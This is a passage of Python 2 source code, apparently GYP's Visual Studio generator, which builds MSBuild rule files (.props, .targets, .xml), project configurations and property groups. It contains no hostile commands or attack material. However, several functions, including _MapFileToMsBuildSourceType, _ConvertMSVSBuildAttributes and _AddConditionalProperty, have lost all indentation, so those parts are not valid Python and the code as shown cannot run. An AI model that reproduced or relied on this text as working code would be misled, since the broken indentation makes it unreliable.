    parent_filter_name: The name of the filter under which the sources are
        found.
    sources: The hierarchy of filters and sources to process.
    extension_to_rule_name: A dictionary mapping file extensions to rules.
    filter_group: The list to which filter entries will be appended.
    source_group: The list to which source entries will be appended.
  """
  for source in sources:
    if not isinstance(source, MSVSProject.Filter):
      # It's a source. Create a source entry.
      _, element = _MapFileToMsBuildSourceType(source, extension_to_rule_name)
      source_entry = [element, {'Include': source}]
      # Specify the filter it is part of, if any.
      if parent_filter_name:
        source_entry.append(['Filter', parent_filter_name])
      source_group.append(source_entry)
      continue
    # We have a sub-filter. Create the name of that sub-filter.
    if parent_filter_name:
      filter_name = '%s\\%s' % (parent_filter_name, source.name)
    else:
      filter_name = source.name
    # Add the filter to the group.
    filter_group.append(
        ['Filter', {'Include': filter_name},
         ['UniqueIdentifier', MSVSNew.MakeGuid(source.name)]])
    # Recurse and add its dependents.
    _AppendFiltersForMSBuild(filter_name, source.contents,
                             extension_to_rule_name,
                             filter_group, source_group)
def _MapFileToMsBuildSourceType(source, extension_to_rule_name):
"""Returns the group and element type of the source file.
Arguments:
source: The source file name.
extension_to_rule_name: A dictionary mapping file extensions to rules.
Returns:
A pair of (group this file should be part of, the label of element)
"""
_, ext = os.path.splitext(source)
if ext in extension_to_rule_name:
group = 'rule'
element = extension_to_rule_name[ext]
elif ext in ['.cc', '.cpp', '.c', '.cxx']:
group = 'compile'
element = 'ClCompile'
elif ext in ['.h', '.hxx']:
group = 'include'
element = 'ClInclude'
elif ext == '.rc':
group = 'resource'
element = 'ResourceCompile'
elif ext == '.idl':
group = 'midl'
element = 'Midl'
else:
group = 'none'
element = 'None'
return (group, element)
def _GenerateRulesForMSBuild(output_dir, options, spec,
                             sources, excluded_sources,
                             props_files_of_rules, targets_files_of_rules,
                             actions_to_add, extension_to_rule_name):
  """Generates the MSBuild implementation of this target's custom rules.

  Native rules produce a .props/.targets/.xml file trio; external rules are
  handed off to _GenerateExternalRules. Updates extension_to_rule_name and
  the *_files_of_rules sets in place; sources/excluded_sources are passed
  to helpers (presumably adjusted there — confirm in _AdjustSourcesForRules).
  """
  # MSBuild rules are implemented using three files: an XML file, a .targets
  # file and a .props file.
  # See http://blogs.msdn.com/b/vcblog/archive/2010/04/21/quick-help-on-vs2010-custom-build-rule.aspx
  # for more details.
  rules = spec.get('rules', [])
  # Split rules into those MSBuild runs natively vs. external ones.
  rules_native = [r for r in rules if not int(r.get('msvs_external_rule', 0))]
  rules_external = [r for r in rules if int(r.get('msvs_external_rule', 0))]
  msbuild_rules = []
  for rule in rules_native:
    # Skip a rule with no action and no inputs.
    if 'action' not in rule and not rule.get('rule_sources', []):
      continue
    msbuild_rule = MSBuildRule(rule, spec)
    msbuild_rules.append(msbuild_rule)
    extension_to_rule_name[msbuild_rule.extension] = msbuild_rule.rule_name
  if msbuild_rules:
    # All three generated files share the target's base name.
    base = spec['target_name'] + options.suffix
    props_name = base + '.props'
    targets_name = base + '.targets'
    xml_name = base + '.xml'
    props_files_of_rules.add(props_name)
    targets_files_of_rules.add(targets_name)
    props_path = os.path.join(output_dir, props_name)
    targets_path = os.path.join(output_dir, targets_name)
    xml_path = os.path.join(output_dir, xml_name)
    _GenerateMSBuildRulePropsFile(props_path, msbuild_rules)
    _GenerateMSBuildRuleTargetsFile(targets_path, msbuild_rules)
    _GenerateMSBuildRuleXmlFile(xml_path, msbuild_rules)
  if rules_external:
    _GenerateExternalRules(rules_external, output_dir, spec,
                           sources, options, actions_to_add)
  _AdjustSourcesForRules(spec, rules, sources, excluded_sources)
class MSBuildRule(object):
  """Used to store information used to generate an MSBuild rule.

  Attributes:
    rule_name: The rule name, sanitized to use in XML.
    target_name: The name of the target.
    after_targets: The name of the AfterTargets element.
    before_targets: The name of the BeforeTargets element.
    depends_on: The name of the DependsOn element.
    compute_output: The name of the ComputeOutput element.
    dirs_to_make: The name of the DirsToMake element.
    inputs: The name of the _inputs element.
    tlog: The name of the _tlog element.
    extension: The extension this rule applies to.
    description: The message displayed when this rule is invoked.
    additional_dependencies: A string listing additional dependencies.
    outputs: The outputs of this rule.
    command: The command used to run the rule.
  """

  def __init__(self, rule, spec):
    self.display_name = rule['rule_name']
    # Sanitize the display name so the rule name is a legal XML identifier:
    # every non-word character becomes an underscore.
    self.rule_name = re.sub(r'\W', '_', self.display_name)
    # Derive the various element names, following the example set by the
    # Visual Studio 2008 to 2010 conversion.  I don't know if VS2010
    # is sensitive to the exact names.
    self.target_name = '_%s' % self.rule_name
    self.after_targets = '%sAfterTargets' % self.rule_name
    self.before_targets = '%sBeforeTargets' % self.rule_name
    self.depends_on = '%sDependsOn' % self.rule_name
    self.compute_output = 'Compute%sOutput' % self.rule_name
    self.dirs_to_make = '%sDirsToMake' % self.rule_name
    self.inputs = '%s_inputs' % self.rule_name
    self.tlog = '%s_tlog' % self.rule_name
    # Normalize the extension to always carry a leading dot.
    extension = rule['extension']
    if not extension.startswith('.'):
      extension = '.' + extension
    self.extension = extension
    self.description = MSVSSettings.ConvertVCMacrosToMSBuild(
        rule.get('message', self.rule_name))
    self.additional_dependencies = ';'.join(
        [MSVSSettings.ConvertVCMacrosToMSBuild(i)
         for i in _FixPaths(rule.get('inputs', []))])
    self.outputs = ';'.join(
        [MSVSSettings.ConvertVCMacrosToMSBuild(i)
         for i in _FixPaths(rule.get('outputs', []))])
    self.command = MSVSSettings.ConvertVCMacrosToMSBuild(
        _BuildCommandLineForRule(spec, rule, has_input_path=True,
                                 do_setup_env=True))
def _GenerateMSBuildRulePropsFile(props_path, msbuild_rules):
  """Generate the .props file.

  For each rule this emits: default Before/After target hooks, the rule's
  DependsOn property, and the default item-definition metadata (command
  line template, outputs, description, additional dependencies).
  """
  content = ['Project',
             {'xmlns': 'http://schemas.microsoft.com/developer/msbuild/2003'}]
  for rule in msbuild_rules:
    content.extend([
        # Default hook points (run before Midl, after CustomBuild) unless the
        # project already set them; never applied to Makefile configurations.
        ['PropertyGroup',
         {'Condition': "'$(%s)' == '' and '$(%s)' == '' and "
          "'$(ConfigurationType)' != 'Makefile'" % (rule.before_targets,
                                                    rule.after_targets)
         },
         [rule.before_targets, 'Midl'],
         [rule.after_targets, 'CustomBuild'],
        ],
        ['PropertyGroup',
         [rule.depends_on,
          {'Condition': "'$(ConfigurationType)' != 'Makefile'"},
          '_SelectedFiles;$(%s)' % rule.depends_on
         ],
        ],
        # Default metadata for items of this rule's item type.
        ['ItemDefinitionGroup',
         [rule.rule_name,
          ['CommandLineTemplate', rule.command],
          ['Outputs', rule.outputs],
          ['ExecutionDescription', rule.description],
          ['AdditionalDependencies', rule.additional_dependencies],
         ],
        ]
    ])
  easy_xml.WriteXmlIfChanged(content, props_path, pretty=True, win32=True)
def _GenerateMSBuildRuleTargetsFile(targets_path, msbuild_rules):
  """Generate the .targets file.

  The .targets file wires each rule into the build: it registers the rule's
  item type, declares a XamlTaskFactory task backed by the generated .xml
  schema, and emits the Target that runs the rule's command line together
  with a Compute<Rule>Output target and .tlog bookkeeping for incremental
  builds.
  """
  content = ['Project',
             {'xmlns': 'http://schemas.microsoft.com/developer/msbuild/2003'
             }
            ]
  # Point the property-pages UI at the generated .xml schema file.
  item_group = [
      'ItemGroup',
      ['PropertyPageSchema',
       {'Include': '$(MSBuildThisFileDirectory)$(MSBuildThisFileName).xml'}
      ]
     ]
  for rule in msbuild_rules:
    # Advertise each rule's item type and the target that consumes it.
    item_group.append(
        ['AvailableItemName',
         {'Include': rule.rule_name},
         ['Targets', rule.target_name],
        ])
  content.append(item_group)
  for rule in msbuild_rules:
    # Register the rule's task via XamlTaskFactory, defined in the .xml file.
    content.append(
        ['UsingTask',
         {'TaskName': rule.rule_name,
          'TaskFactory': 'XamlTaskFactory',
          'AssemblyName': 'Microsoft.Build.Tasks.v4.0'
         },
         ['Task', '$(MSBuildThisFileDirectory)$(MSBuildThisFileName).xml'],
        ])
  for rule in msbuild_rules:
    rule_name = rule.rule_name
    target_outputs = '%%(%s.Outputs)' % rule_name
    target_inputs = ('%%(%s.Identity);%%(%s.AdditionalDependencies);'
                     '$(MSBuildProjectFile)') % (rule_name, rule_name)
    rule_inputs = '%%(%s.Identity)' % rule_name
    extension_condition = ("'%(Extension)'=='.obj' or "
                           "'%(Extension)'=='.res' or "
                           "'%(Extension)'=='.rsc' or "
                           "'%(Extension)'=='.lib'")
    # When the IDE builds only selected files, drop rule items not in the
    # selection.
    remove_section = [
        'ItemGroup',
        {'Condition': "'@(SelectedFiles)' != ''"},
        [rule_name,
         {'Remove': '@(%s)' % rule_name,
          'Condition': "'%(Identity)' != '@(SelectedFiles)'"
         }
        ]
    ]
    inputs_section = [
        'ItemGroup',
        [rule.inputs, {'Include': '%%(%s.AdditionalDependencies)' % rule_name}]
    ]
    # Collect rule outputs into a _tlog item used to write the tracking logs.
    logging_section = [
        'ItemGroup',
        [rule.tlog,
         {'Include': '%%(%s.Outputs)' % rule_name,
          'Condition': ("'%%(%s.Outputs)' != '' and "
                        "'%%(%s.ExcludedFromBuild)' != 'true'" %
                        (rule_name, rule_name))
         },
         ['Source', "@(%s, '|')" % rule_name],
         ['Inputs', "@(%s -> '%%(Fullpath)', ';')" % rule.inputs],
        ],
    ]
    message_section = [
        'Message',
        {'Importance': 'High',
         'Text': '%%(%s.ExecutionDescription)' % rule_name
        }
    ]
    # Emit .write.1.tlog / .read.1.tlog so incremental builds can detect
    # changed outputs and inputs.
    write_tlog_section = [
        'WriteLinesToFile',
        {'Condition': "'@(%s)' != '' and '%%(%s.ExcludedFromBuild)' != "
         "'true'" % (rule.tlog, rule.tlog),
         'File': '$(IntDir)$(ProjectName).write.1.tlog',
         'Lines': "^%%(%s.Source);@(%s->'%%(Fullpath)')" % (rule.tlog,
                                                            rule.tlog)
        }
    ]
    read_tlog_section = [
        'WriteLinesToFile',
        {'Condition': "'@(%s)' != '' and '%%(%s.ExcludedFromBuild)' != "
         "'true'" % (rule.tlog, rule.tlog),
         'File': '$(IntDir)$(ProjectName).read.1.tlog',
         'Lines': "^%%(%s.Source);%%(%s.Inputs)" % (rule.tlog, rule.tlog)
        }
    ]
    # The actual task invocation for items that are not excluded.
    command_and_input_section = [
        rule_name,
        {'Condition': "'@(%s)' != '' and '%%(%s.ExcludedFromBuild)' != "
         "'true'" % (rule_name, rule_name),
         'CommandLineTemplate': '%%(%s.CommandLineTemplate)' % rule_name,
         'AdditionalOptions': '%%(%s.AdditionalOptions)' % rule_name,
         'Inputs': rule_inputs
        }
    ]
    content.extend([
        # Main target: runs the rule, hooked between Before/After targets.
        ['Target',
         {'Name': rule.target_name,
          'BeforeTargets': '$(%s)' % rule.before_targets,
          'AfterTargets': '$(%s)' % rule.after_targets,
          'Condition': "'@(%s)' != ''" % rule_name,
          'DependsOnTargets': '$(%s);%s' % (rule.depends_on,
                                            rule.compute_output),
          'Outputs': target_outputs,
          'Inputs': target_inputs
         },
         remove_section,
         inputs_section,
         logging_section,
         message_section,
         write_tlog_section,
         read_tlog_section,
         command_and_input_section,
        ],
        # Make the compute-output target run as part of link/lib input
        # computation.
        ['PropertyGroup',
         ['ComputeLinkInputsTargets',
          '$(ComputeLinkInputsTargets);',
          '%s;' % rule.compute_output
         ],
         ['ComputeLibInputsTargets',
          '$(ComputeLibInputsTargets);',
          '%s;' % rule.compute_output
         ],
        ],
        # Compute-output target: feeds rule outputs with known extensions to
        # Link/Lib/ImpLib and creates output directories.
        ['Target',
         {'Name': rule.compute_output,
          'Condition': "'@(%s)' != ''" % rule_name
         },
         ['ItemGroup',
          [rule.dirs_to_make,
           {'Condition': "'@(%s)' != '' and "
            "'%%(%s.ExcludedFromBuild)' != 'true'" % (rule_name, rule_name),
            'Include': '%%(%s.Outputs)' % rule_name
           }
          ],
          ['Link',
           {'Include': '%%(%s.Identity)' % rule.dirs_to_make,
            'Condition': extension_condition
           }
          ],
          ['Lib',
           {'Include': '%%(%s.Identity)' % rule.dirs_to_make,
            'Condition': extension_condition
           }
          ],
          ['ImpLib',
           {'Include': '%%(%s.Identity)' % rule.dirs_to_make,
            'Condition': extension_condition
           }
          ],
         ],
         ['MakeDir',
          {'Directories': ("@(%s->'%%(RootDir)%%(Directory)')" %
                           rule.dirs_to_make)
          }
         ]
        ],
      ])
  easy_xml.WriteXmlIfChanged(content, targets_path, pretty=True, win32=True)
def _GenerateMSBuildRuleXmlFile(xml_path, msbuild_rules):
  """Generate the .xml file.

  The .xml file is the XAML schema describing each rule's properties (for
  the property pages UI and the XamlTaskFactory task): inputs, outputs,
  command line, Before/After target selectors, and the item/content type
  registrations for the rule's file extension.
  """
  # Generate the .xml file
  content = [
      'ProjectSchemaDefinitions',
      {'xmlns': ('clr-namespace:Microsoft.Build.Framework.XamlTypes;'
                 'assembly=Microsoft.Build.Framework'),
       'xmlns:x': 'http://schemas.microsoft.com/winfx/2006/xaml',
       'xmlns:sys': 'clr-namespace:System;assembly=mscorlib',
       'xmlns:transformCallback':
       'Microsoft.Cpp.Dev10.ConvertPropertyCallback'
      }
  ]
  for rule in msbuild_rules:
    content.extend([
        # The Rule element: its properties and UI categories.
        ['Rule',
         {'Name': rule.rule_name,
          'PageTemplate': 'tool',
          'DisplayName': rule.display_name,
          'Order': '200'
         },
         ['Rule.DataSource',
          ['DataSource',
           {'Persistence': 'ProjectFile',
            'ItemType': rule.rule_name
           }
          ]
         ],
         ['Rule.Categories',
          ['Category',
           {'Name': 'General'},
           ['Category.DisplayName',
            ['sys:String', 'General'],
           ],
          ],
          ['Category',
           {'Name': 'Command Line',
            'Subtype': 'CommandLine'
           },
           ['Category.DisplayName',
            ['sys:String', 'Command Line'],
           ],
          ],
         ],
         # The rule's input items (sourced from project-file items).
         ['StringListProperty',
          {'Name': 'Inputs',
           'Category': 'Command Line',
           'IsRequired': 'true',
           'Switch': ' '
          },
          ['StringListProperty.DataSource',
           ['DataSource',
            {'Persistence': 'ProjectFile',
             'ItemType': rule.rule_name,
             'SourceType': 'Item'
            }
           ]
          ],
         ],
         ['StringProperty',
          {'Name': 'CommandLineTemplate',
           'DisplayName': 'Command Line',
           'Visible': 'False',
           'IncludeInCommandLine': 'False'
          }
         ],
         # "Execute Before" selector, populated by the Targets enum provider.
         ['DynamicEnumProperty',
          {'Name': rule.before_targets,
           'Category': 'General',
           'EnumProvider': 'Targets',
           'IncludeInCommandLine': 'False'
          },
          ['DynamicEnumProperty.DisplayName',
           ['sys:String', 'Execute Before'],
          ],
          ['DynamicEnumProperty.Description',
           ['sys:String', 'Specifies the targets for the build customization'
            ' to run before.'
           ],
          ],
          ['DynamicEnumProperty.ProviderSettings',
           ['NameValuePair',
            {'Name': 'Exclude',
             'Value': '^%s|^Compute' % rule.before_targets
            }
           ]
          ],
          ['DynamicEnumProperty.DataSource',
           ['DataSource',
            {'Persistence': 'ProjectFile',
             'HasConfigurationCondition': 'true'
            }
           ]
          ],
         ],
         # "Execute After" selector, analogous to the one above.
         ['DynamicEnumProperty',
          {'Name': rule.after_targets,
           'Category': 'General',
           'EnumProvider': 'Targets',
           'IncludeInCommandLine': 'False'
          },
          ['DynamicEnumProperty.DisplayName',
           ['sys:String', 'Execute After'],
          ],
          ['DynamicEnumProperty.Description',
           ['sys:String', ('Specifies the targets for the build customization'
                           ' to run after.')
           ],
          ],
          ['DynamicEnumProperty.ProviderSettings',
           ['NameValuePair',
            {'Name': 'Exclude',
             'Value': '^%s|^Compute' % rule.after_targets
            }
           ]
          ],
          ['DynamicEnumProperty.DataSource',
           ['DataSource',
            {'Persistence': 'ProjectFile',
             'ItemType': '',
             'HasConfigurationCondition': 'true'
            }
           ]
          ],
         ],
         ['StringListProperty',
          {'Name': 'Outputs',
           'DisplayName': 'Outputs',
           'Visible': 'False',
           'IncludeInCommandLine': 'False'
          }
         ],
         ['StringProperty',
          {'Name': 'ExecutionDescription',
           'DisplayName': 'Execution Description',
           'Visible': 'False',
           'IncludeInCommandLine': 'False'
          }
         ],
         ['StringListProperty',
          {'Name': 'AdditionalDependencies',
           'DisplayName': 'Additional Dependencies',
           'IncludeInCommandLine': 'False',
           'Visible': 'false'
          }
         ],
         ['StringProperty',
          {'Subtype': 'AdditionalOptions',
           'Name': 'AdditionalOptions',
           'Category': 'Command Line'
          },
          ['StringProperty.DisplayName',
           ['sys:String', 'Additional Options'],
          ],
          ['StringProperty.Description',
           ['sys:String', 'Additional Options'],
          ],
         ],
        ],
        # Register the rule's item type and bind the file extension to it.
        ['ItemType',
         {'Name': rule.rule_name,
          'DisplayName': rule.display_name
         }
        ],
        ['FileExtension',
         {'Name': '*' + rule.extension,
          'ContentType': rule.rule_name
         }
        ],
        ['ContentType',
         {'Name': rule.rule_name,
          'DisplayName': '',
          'ItemType': rule.rule_name
         }
        ]
    ])
  easy_xml.WriteXmlIfChanged(content, xml_path, pretty=True, win32=True)
def _GetConfigurationAndPlatform(name, settings):
configuration = name.rsplit('_', 1)[0]
platform = settings.get('msvs_configuration_platform', 'Win32')
return (configuration, platform)
def _GetConfigurationCondition(name, settings):
  """Returns the MSBuild Condition string selecting this configuration."""
  configuration, platform = _GetConfigurationAndPlatform(name, settings)
  return r"'$(Configuration)|$(Platform)'=='%s|%s'" % (configuration, platform)
def _GetMSBuildProjectConfigurations(configurations):
  """Builds the ProjectConfigurations ItemGroup element."""
  group = ['ItemGroup', {'Label': 'ProjectConfigurations'}]
  for name, settings in sorted(configurations.iteritems()):
    configuration, platform = _GetConfigurationAndPlatform(name, settings)
    group.append(
        ['ProjectConfiguration',
         {'Include': '%s|%s' % (configuration, platform)},
         ['Configuration', configuration],
         ['Platform', platform]])
  return [group]
def _GetMSBuildGlobalProperties(spec, guid, gyp_file_name):
namespace = os.path.splitext(gyp_file_name)[0]
return [
['PropertyGroup', {'Label': 'Globals'},
['ProjectGuid', guid],
['Keyword', 'Win32Proj'],
['RootNamespace', namespace],
]
]
def _GetMSBuildConfigurationDetails(spec, build_file):
  """Returns the per-configuration ConfigurationType/CharacterSet group."""
  properties = {}
  for name, settings in spec['configurations'].iteritems():
    msbuild_attributes = _GetMSBuildAttributes(spec, settings, build_file)
    condition = _GetConfigurationCondition(name, settings)
    _AddConditionalProperty(properties, condition, 'ConfigurationType',
                            msbuild_attributes['ConfigurationType'])
    # CharacterSet is optional; only emit it when present.
    character_set = msbuild_attributes.get('CharacterSet')
    if character_set:
      _AddConditionalProperty(properties, condition, 'CharacterSet',
                              character_set)
  return _GetMSBuildPropertyGroup(spec, 'Configuration', properties)
def _GetMSBuildLocalProperties(msbuild_toolset):
# Currently the only local property we support is PlatformToolset
properties = {}
if msbuild_toolset:
properties = [
['PropertyGroup', {'Label': 'Locals'},
['PlatformToolset', msbuild_toolset],
]
]
return properties
def _GetMSBuildPropertySheets(configurations):
  """Returns the ImportGroup elements importing property sheets.

  Every configuration imports the per-user props sheet; configurations that
  declare 'msbuild_props' additionally import those sheets, which forces a
  per-configuration ImportGroup.
  """
  user_props = r'$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props'
  additional_props = {}
  props_specified = False
  for name, settings in sorted(configurations.iteritems()):
    configuration = _GetConfigurationCondition(name, settings)
    # dict.has_key() is deprecated (removed in Python 3); use 'in' instead.
    if 'msbuild_props' in settings:
      additional_props[configuration] = _FixPaths(settings['msbuild_props'])
      props_specified = True
    else:
      additional_props[configuration] = ''

  if not props_specified:
    # No configuration-specific sheets: a single unconditional ImportGroup.
    return [
        ['ImportGroup',
         {'Label': 'PropertySheets'},
         ['Import',
          {'Project': user_props,
           'Condition': "exists('%s')" % user_props,
           'Label': 'LocalAppDataPlatform'
          }
         ]
        ]
    ]
  else:
    # One ImportGroup per configuration, each with its extra sheets.
    sheets = []
    for condition, props in additional_props.iteritems():
      import_group = [
          'ImportGroup',
          {'Label': 'PropertySheets',
           'Condition': condition
          },
          ['Import',
           {'Project': user_props,
            'Condition': "exists('%s')" % user_props,
            'Label': 'LocalAppDataPlatform'
           }
          ]
      ]
      for props_file in props:
        import_group.append(['Import', {'Project':props_file}])
      sheets.append(import_group)
    return sheets
def _ConvertMSVSBuildAttributes(spec, config, build_file):
config_type = _GetMSVSConfigurationType(spec, build_file)
msvs_attributes = _GetMSVSAttributes(spec, config, config_type)
msbuild_attributes = {}
for a in msvs_attributes:
if a in ['IntermediateDirectory', 'OutputDirectory']:
directory = MSVSSettings.ConvertVCMacrosToMSBuild(msvs_attributes[a])
if not directory.endswith('\\'):
directory += '\\'
msbuild_attributes[a] = directory
elif a == 'CharacterSet':
msbuild_attributes[a] = _ConvertMSVSCharacterSet(msvs_attributes[a])
elif a == 'ConfigurationType':
msbuild_attributes[a] = _ConvertMSVSConfigurationType(msvs_attributes[a])
else:
print 'Warning: Do not know how to convert MSVS attribute ' + a
return msbuild_attributes
def _ConvertMSVSCharacterSet(char_set):
if char_set.isdigit():
char_set = {
'0': 'MultiByte',
'1': 'Unicode',
'2': 'MultiByte',
}[char_set]
return char_set
def _ConvertMSVSConfigurationType(config_type):
if config_type.isdigit():
config_type = {
'1': 'Application',
'2': 'DynamicLibrary',
'4': 'StaticLibrary',
'10': 'Utility'
}[config_type]
return config_type
def _GetMSBuildAttributes(spec, config, build_file):
  """Returns the MSBuild configuration attributes for one configuration.

  Either converts the MSVS attributes, or starts from an explicit
  'msbuild_configuration_attributes' dict and fills in defaults.  Also
  derives TargetName/TargetPath so generated projects avoid the MSB8012
  output-file mismatch warning.
  """
  if 'msbuild_configuration_attributes' not in config:
    msbuild_attributes = _ConvertMSVSBuildAttributes(spec, config, build_file)
  else:
    config_type = _GetMSVSConfigurationType(spec, build_file)
    config_type = _ConvertMSVSConfigurationType(config_type)
    msbuild_attributes = config.get('msbuild_configuration_attributes', {})
    msbuild_attributes.setdefault('ConfigurationType', config_type)
    # Directories default relative to the solution/configuration and must
    # end with a backslash.
    output_dir = msbuild_attributes.get('OutputDirectory',
                                      '$(SolutionDir)$(Configuration)')
    msbuild_attributes['OutputDirectory'] = _FixPath(output_dir) + '\\'
    if 'IntermediateDirectory' not in msbuild_attributes:
      intermediate = _FixPath('$(Configuration)') + '\\'
      msbuild_attributes['IntermediateDirectory'] = intermediate
    if 'CharacterSet' in msbuild_attributes:
      msbuild_attributes['CharacterSet'] = _ConvertMSVSCharacterSet(
        msbuild_attributes['CharacterSet'])
  if 'TargetName' not in msbuild_attributes:
    prefix = spec.get('product_prefix', '')
    product_name = spec.get('product_name', '$(ProjectName)')
    target_name = prefix + product_name
    msbuild_attributes['TargetName'] = target_name
  if spec.get('msvs_external_builder'):
    # External builders (e.g. ninja) place outputs in their own directory.
    external_out_dir = spec.get('msvs_external_builder_out_dir', '.')
    msbuild_attributes['OutputDirectory'] = _FixPath(external_out_dir) + '\\'

  # Make sure that 'TargetPath' matches 'Lib.OutputFile' or 'Link.OutputFile'
  # (depending on the tool used) to avoid MSB8012 warning.
  msbuild_tool_map = {
      'executable': 'Link',
      'shared_library': 'Link',
      'loadable_module': 'Link',
      'static_library': 'Lib',
  }
  msbuild_tool = msbuild_tool_map.get(spec['type'])
  if msbuild_tool:
    msbuild_settings = config['finalized_msbuild_settings']
    out_file = msbuild_settings[msbuild_tool].get('OutputFile')
    if out_file:
      msbuild_attributes['TargetPath'] = _FixPath(out_file)
    target_ext = msbuild_settings[msbuild_tool].get('TargetExt')
    if target_ext:
      msbuild_attributes['TargetExt'] = target_ext

  return msbuild_attributes
def _GetMSBuildConfigurationGlobalProperties(spec, configurations, build_file):
  """Returns the per-configuration global property group.

  Emits IntDir/OutDir/TargetName (and optionally TargetPath/TargetExt,
  ExecutablePath) plus any global (tool-name '') finalized MSBuild settings,
  each conditioned on its configuration.
  """
  # TODO(jeanluc) We could optimize out the following and do it only if
  # there are actions.
  # TODO(jeanluc) Handle the equivalent of setting 'CYGWIN=nontsec'.
  new_paths = []
  cygwin_dirs = spec.get('msvs_cygwin_dirs', ['.'])[0]
  if cygwin_dirs:
    cyg_path = '$(MSBuildProjectDirectory)\\%s\\bin\\' % _FixPath(cygwin_dirs)
    new_paths.append(cyg_path)
    # TODO(jeanluc) Change the convention to have both a cygwin_dir and a
    # python_dir.
    python_path = cyg_path.replace('cygwin\\bin', 'python_26')
    new_paths.append(python_path)
    if new_paths:
      new_paths = '$(ExecutablePath);' + ';'.join(new_paths)

  properties = {}
  for (name, configuration) in sorted(configurations.iteritems()):
    condition = _GetConfigurationCondition(name, configuration)
    attributes = _GetMSBuildAttributes(spec, configuration, build_file)
    msbuild_settings = configuration['finalized_msbuild_settings']
    _AddConditionalProperty(properties, condition, 'IntDir',
                            attributes['IntermediateDirectory'])
    _AddConditionalProperty(properties, condition, 'OutDir',
                            attributes['OutputDirectory'])
    _AddConditionalProperty(properties, condition, 'TargetName',
                            attributes['TargetName'])

    if attributes.get('TargetPath'):
      _AddConditionalProperty(properties, condition, 'TargetPath',
                              attributes['TargetPath'])
    if attributes.get('TargetExt'):
      _AddConditionalProperty(properties, condition, 'TargetExt',
                              attributes['TargetExt'])

    if new_paths:
      _AddConditionalProperty(properties, condition, 'ExecutablePath',
                              new_paths)
    # The '' tool holds global (non-tool) settings.
    tool_settings = msbuild_settings.get('', {})
    for name, value in sorted(tool_settings.iteritems()):
      formatted_value = _GetValueFormattedForMSBuild('', name, value)
      _AddConditionalProperty(properties, condition, name, formatted_value)
  return _GetMSBuildPropertyGroup(spec, None, properties)
def _AddConditionalProperty(properties, condition, name, value):
"""Adds a property / conditional value pair to a dictionary.
Arguments:
properties: The dictionary to be modified. The key is the name of the
property. The value is itself a dictionary; its key is the value and
the value a list of condition for which this value is true.
condition: The condition under which the named property has the value.
name: The name of the property.
value: The value of the property.
"""
if name not in properties:
properties[name] = {}
values = properties[name]
if value not in values:
values[value] = []
conditions = values[value]
conditions.append(condition)
# Regex for msvs variable references ( i.e. $(FOO) ).
# Use a raw string: '\$' and '\(' are invalid escape sequences in a normal
# string literal (DeprecationWarning, slated to become an error).
MSVS_VARIABLE_REFERENCE = re.compile(r'\$\(([a-zA-Z_][a-zA-Z0-9_]*)\)')
def _GetMSBuildPropertyGroup(spec, label, properties):
  """Returns a PropertyGroup definition for the specified properties.

  Arguments:
    spec: The target project dict.
    label: An optional label for the PropertyGroup.
    properties: The dictionary to be converted.  The key is the name of the
        property.  The value is itself a dictionary; its key is the value and
        the value a list of condition for which this value is true.
  """
  group = ['PropertyGroup']
  if label:
    group.append({'Label': label})
  num_configurations = len(spec['configurations'])
  # Edge function for the topological sort below: which other properties
  # does `node` reference in any of its values?
  def GetEdges(node):
    # Use a definition of edges such that user_of_variable -> used_varible.
    # This happens to be easier in this case, since a variable's
    # definition contains all variables it references in a single string.
    edges = set()
    for value in sorted(properties[node].keys()):
      # Add to edges all $(...) references to variables.
      #
      # Variable references that refer to names not in properties are excluded
      # These can exist for instance to refer built in definitions like
      # $(SolutionDir).
      #
      # Self references are ignored. Self reference is used in a few places to
      # append to the default value. I.e. PATH=$(PATH);other_path
      edges.update(set([v for v in MSVS_VARIABLE_REFERENCE.findall(value)
                        if v in properties and v != node]))
    return edges
  properties_ordered = gyp.common.TopologicallySorted(
      properties.keys(), GetEdges)
  # Walk properties in the reverse of a topological sort on
  # user_of_variable -> used_variable as this ensures variables are
  # defined before they are used.
  # NOTE: reverse(topsort(DAG)) = topsort(reverse_edges(DAG))
  for name in reversed(properties_ordered):
    values = properties[name]
    for value, conditions in sorted(values.iteritems()):
      if len(conditions) == num_configurations:
        # If the value is the same all configurations,
        # just add one unconditional entry.
        group.append([name, value])
      else:
        for condition in conditions:
          group.append([name, {'Condition': condition}, value])
  return [group]
def _GetMSBuildToolSettingsSections(spec, configurations):
  """Returns ItemDefinitionGroup sections for each configuration's tools."""
  groups = []
  for config_name, configuration in sorted(configurations.iteritems()):
    msbuild_settings = configuration['finalized_msbuild_settings']
    group = ['ItemDefinitionGroup',
             {'Condition': _GetConfigurationCondition(config_name,
                                                      configuration)}
            ]
    for tool_name, tool_settings in sorted(msbuild_settings.iteritems()):
      # Skip the tool named '' which is a holder of global settings handled
      # by _GetMSBuildConfigurationGlobalProperties, and tools with no
      # settings at all.
      if not tool_name or not tool_settings:
        continue
      tool = [tool_name]
      for setting_name, setting_value in sorted(tool_settings.iteritems()):
        formatted_value = _GetValueFormattedForMSBuild(tool_name, setting_name,
                                                       setting_value)
        tool.append([setting_name, formatted_value])
      group.append(tool)
    groups.append(group)
  return groups
def _FinalizeMSBuildSettings(spec, configuration):
  """Computes and stores the configuration's finalized MSBuild settings.

  Starts from explicit 'msbuild_settings' (validated) or converts
  'msvs_settings', then folds in include dirs, libraries, defines, disabled
  warnings, precompiled-header and module-definition settings.  The result
  is stored under configuration['finalized_msbuild_settings'].
  """
  if 'msbuild_settings' in configuration:
    converted = False
    msbuild_settings = configuration['msbuild_settings']
    MSVSSettings.ValidateMSBuildSettings(msbuild_settings)
  else:
    converted = True
    msvs_settings = configuration.get('msvs_settings', {})
    msbuild_settings = MSVSSettings.ConvertToMSBuildSettings(msvs_settings)
  include_dirs, resource_include_dirs = _GetIncludeDirs(configuration)
  libraries = _GetLibraries(spec)
  library_dirs = _GetLibraryDirs(configuration)
  out_file, _, msbuild_tool = _GetOutputFilePathAndTool(spec, msbuild=True)
  target_ext = _GetOutputTargetExt(spec)
  defines = _GetDefines(configuration)
  if converted:
    # Visual Studio 2010 has TR1
    defines = [d for d in defines if d != '_HAS_TR1=0']
    # Warn of ignored settings
    ignored_settings = ['msvs_prebuild', 'msvs_postbuild', 'msvs_tool_files']
    for ignored_setting in ignored_settings:
      value = configuration.get(ignored_setting)
      if value:
        print ('Warning: The automatic conversion to MSBuild does not handle '
               '%s. Ignoring setting of %s' % (ignored_setting, str(value)))

  defines = [_EscapeCppDefineForMSBuild(d) for d in defines]
  disabled_warnings = _GetDisabledWarnings(configuration)
